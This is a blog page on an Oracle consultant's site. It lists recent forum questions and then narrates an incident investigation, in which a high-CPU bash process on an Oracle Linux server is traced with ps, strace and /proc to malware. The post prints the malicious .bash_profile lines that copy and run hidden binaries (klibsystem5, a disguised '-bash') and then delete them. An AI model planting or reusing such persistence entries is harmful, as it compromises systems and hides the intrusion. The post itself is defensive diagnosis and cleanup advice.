Erman Arslan's Oracle Blog: May 2024

Friday, May 31, 2024

Erman Arslan's Oracle Forum / APR 23 - MAY 31, 2024 - "Q & A Series"

Empower yourself with knowledge! Erman Arslan's Oracle Blog offers a vibrant forum where you can tap into a wealth of experience. Get expert guidance and connect with a supportive community. Click the banner proclaiming "Erman Arslan's Oracle Forum is available now!" Dive into the conversation and ask your burning questions.

-- or just use the direct link: http://erman-arslan-s-oracle-forum.124.s1.nabble.com A testament to its vibrancy: over 2,000 questions have been posed, sparking nearly 10,000 insightful comments. Explore the latest discussions and see what valuable knowledge awaits!

Supporting the Oracle users around the world. Let's check what we have in the last few weeks..

explain plan by Roshan

APPS user by big

General exception while launching forms by satish

Issue some users are facing by VinodN

Auto Generating -bash process by kvmishra

BSDataSource": IO Error: Socket read timed - R12.2.5 by satish

Oracle forms and reports without Oracle Weblogic by kvmishra

How to read/interpret Weblogic Server logs by VinodN

WARNING: The converted filename is an ASM fully qualified filename. by raiq1

Login issues R12.2.5 by satish

Login issue r12.2.5 by satish

Oracle Embedding Concept by kvmishra

oacore warrning by anmar

Disabling path in multipath by satish

R12.2 upgrade DB by big

fast forward database - test password expiry by Roshan

fast forward database - test password expiry by Roshan

E-business APEX HTTPS by big

Requests stuck in Pending Standby by VinodN

Tuesday, May 14, 2024

Linux -- Decoding the High CPU Usage Mystery: A Bash Shell Odyssey / Autogenerating bash process - Malware - klibsystem5 & bprofr

Decoding the High CPU Usage Mystery: A Bash Shell Odyssey

This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. This systematic investigation identified malicious scripts causing the high CPU usage. This blog post also offers valuable insights into troubleshooting bash process issues and highlights the importance of secure system configurations.

Note that, this is based on a real story. (an issue reported to me through my forum: Erman Arslan's Oracle Forum)

The Case:

Customer, encountered a bash process consuming 98% CPU. Killing it only brought temporary relief as it automatically restarts.

The Investigation Begins:

I requested more information to understand the process's behavior. Customer provided the top command output, revealed the bash process with a high CPU usage.

Digging Deeper:

I suggested using ps with the -elf flag to get detailed process information. This revealed the bash process is in the sleeping state (s). Analyzing the /proc/8879/cmdline file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.

Next, I requested the output of w to see logged-in users and processes. This helped rule out user interaction as the cause.

Process Examination:

I instructed customer to examine the contents of the bash process's working directory (/proc/8879/cwd) and open file descriptors (cd /proc/8879/fd/; ls -la). This revealed the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).

Background info:

Unknown process with -bash not showing it: This process might be a child process spawned by the bash shell itself, or another system service running in the background.

4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.

It is probably a OS process.. Probably, OS or a daemon starts it.. It may belong to a monitoring process such as systemd-monitor.

*Use ps aux or pstree to get a detailed listing of running processes. Look for processes with a parent process ID (PPID) matching the bash shell (bash).

Stracing the System Call:

I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:

epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.

The arguments to epoll_pwait specify the epoll instance, timeout values, and number of events to wait for.

Analysis of strace Output:

The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).

Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.

Suggested more investigation:

Check cron jobs and systemd services for any entries that might be starting the bash process.
Review system logs (/var/log/messages and dmesg) for any errors related to the process.
Investigate Script Purpose.. If the script is legitimate, investigate its purpose and modify it to avoid excessive I/O calls and resource usage.
Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This was a complex approach and should have been only be attempted with a thorough understanding of the potential consequences.
Suggested commands for getting information on the context :

pstree
cat /proc/<pid>/cmdline
cat /proc/<pid>/cwd
cd /proc/<pid>/fd; ls -al
ls -l /proc/<pid>/cwd
strace -p <pid>
lsof -p <pid>
crontab -l
systemd services with systemctl list-unit-files and systemctl status <service_name>.
cat .bash_profile (customer discovered this one.. by the help of the suggestions)

The Culprit Revealed:

With the provided guidance, customer discovered a suspicious entry in his .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.

--
I can see, there is an entry made in .bash_profile by automatically. please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

*The system was affected by klibsystem4 and bprofr.. These were malwares..

Suggestions for the fix:

Manual removal of the malware(s) - klibsystem5 & bprofr , by discovering their source files and the affected system files and deleting(purifying in the case of the system files) all of them one by one.

Automatic removal via a tool, via a Linux virus scanner. ("clamav" is an example for such tool , it is an easy to use tool) -- https://oracle-base.com/articles/linux/linux-antivirus-clamav *Note that care must be taken not to delete any of the system files, or EBS-related file.

Migrating the affected applications / databases to a new server.. This might be a better option in the case we can't be sure about the removal of whole of the malware(s). But if we migrate, there is a risk that we migrate the malware too. So a careful and delicate work is required..

Subscribe to: Comments ( Atom )